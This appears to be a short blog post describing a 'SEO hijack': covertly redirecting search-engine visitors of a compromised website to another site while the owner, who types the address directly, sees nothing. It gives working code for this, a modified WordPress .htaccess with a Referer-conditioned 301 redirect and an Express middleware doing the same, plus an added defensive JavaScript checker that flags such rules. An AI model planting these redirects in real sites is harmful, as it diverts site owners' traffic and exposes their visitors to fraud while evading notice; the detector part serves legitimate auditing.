SEO hijack

I thought about an exploit of the dev team / owner of a site.
They mainly reach the site by typing the address directly.
Regular users, however, use a search engine to find the site, even after the first visit.
So if we can hijack that traffic to another website, we can do it without the owner noticing…

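The idea is to check for the Referer header and redirect the user, or inject code, only for this traffic: a visit typed into the address bar carries no Referer header, while a click from a search results page usually does.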

.htaccess – WordPress/PHP websites

For a new installation of WP, the .htaccess file looks like this:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

We’ll add two lines to the .htaccess file, a RewriteCond and a RewriteRule placed before the default WordPress conditions:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
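# Added line 1: matches any request that carries a non-empty Referer header
RewriteCond %{HTTP_REFERER} .
# Added line 2: sends those requests to another site with a permanent (301) redirect
RewriteRule ^(.*)$ http://The_redirected_site.com [R=301,L]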
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
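
For a site owner auditing for this change, the check below is an added example (not code from the original post): it parses .htaccess text and reports any RewriteRule that redirects to a foreign host under a condition on HTTP_REFERER. The function name, the ownHosts parameter and example.org are assumptions made for the illustration.

```javascript
// Added example (not from the original post): flag RewriteRules that send
// visitors off-site only when a Referer header is present.
// mod_rewrite attaches consecutive RewriteCond lines to the next RewriteRule only.
function findReferrerRedirects(htaccessText, ownHosts) {
  const findings = [];
  let pendingConds = []; // test strings waiting for their RewriteRule
  htaccessText.split(/\r?\n/).forEach((raw, idx) => {
    const tokens = raw.trim().split(/\s+/);
    const directive = tokens[0].toLowerCase();
    if (directive === 'rewritecond') {
      pendingConds.push(tokens[1] || '');
      return;
    }
    if (directive !== 'rewriterule') return; // comments, blanks, other directives
    const conds = pendingConds;
    pendingConds = []; // conditions are consumed by this rule
    const usesReferer = conds.some((c) => /%\{HTTP_REFERER\}/i.test(c));
    // An absolute URL to another host makes Apache issue an external redirect,
    // with or without the [R] flag.
    const m = /^https?:\/\/([^\/:\s]+)/i.exec(tokens[2] || '');
    if (!usesReferer || !m) return;
    const host = m[1].toLowerCase();
    if (ownHosts.includes(host)) return; // redirect to a host the owner controls
    findings.push({ line: idx + 1, host, rule: raw.trim() });
  });
  return findings;
}

// Constructed sample: the modified WordPress .htaccess shown above.
const SAMPLE_HTACCESS = [
  '# BEGIN WordPress',
  '<IfModule mod_rewrite.c>',
  'RewriteEngine On',
  'RewriteBase /',
  'RewriteRule ^index\\.php$ - [L]',
  'RewriteCond %{HTTP_REFERER} .',
  'RewriteRule ^(.*)$ http://The_redirected_site.com [R=301,L]',
  'RewriteCond %{REQUEST_FILENAME} !-f',
  'RewriteCond %{REQUEST_FILENAME} !-d',
  'RewriteRule . /index.php [L]',
  '</IfModule>',
  '# END WordPress',
].join('\n');

// 'example.org' is a hypothetical stand-in for the site's own hostname.
console.log(findReferrerRedirects(SAMPLE_HTACCESS, ['example.org']));
```

A redirect placed in application code does not appear in .htaccess; comparing the site's response to the same request with and without a Referer header catches both cases.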

Node.js with Express 4

We’ll add a middleware in app.js, before the routes:

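// Runs for every path, before any route handler
app.use('*', function (req, res, next) {
  // A Referer header means the visitor followed a link, e.g. from a search result
  if (typeof req.headers.referer !== 'undefined') {
    res.redirect('http://The_redirected_site.com')
  } else {
    // Direct visits (address typed in) carry no Referer and see the normal site
    next()
  }
})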
